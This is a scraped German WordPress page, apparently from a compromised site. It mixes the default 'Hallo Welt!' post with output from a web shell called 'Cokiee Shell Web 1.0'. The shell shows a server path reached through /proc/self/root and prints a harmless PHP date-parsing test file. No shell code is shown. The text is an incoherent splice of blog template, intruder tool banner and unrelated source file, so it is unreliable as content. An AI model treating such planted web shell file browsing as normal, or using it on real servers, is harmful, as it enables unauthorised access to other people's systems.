Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/bug33578.phpt |
--TEST-- Bug #33578 (strtotime() doesn't parse "11 Oct" format") --FILE-- <?php date_default_timezone_set("UTC"); echo date('m/d/Y', strtotime('Oct 11')), "\n"; echo date('m/d/Y', strtotime('11 Oct')), "\n"; echo date('m/d/Y', strtotime('11 Oct 2005')), "\n"; echo date('m/d/Y', strtotime('Oct11')), "\n"; echo date('m/d/Y', strtotime('11Oct')), "\n"; echo date('m/d/Y', strtotime('11Oct 2005')), "\n"; echo date('m/d/Y', strtotime('11Oct2005')), "\n"; ?> --EXPECTF-- 10/11/%d 10/11/%d 10/11/2005 10/11/%d 10/11/%d 10/11/2005 10/11/2005
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare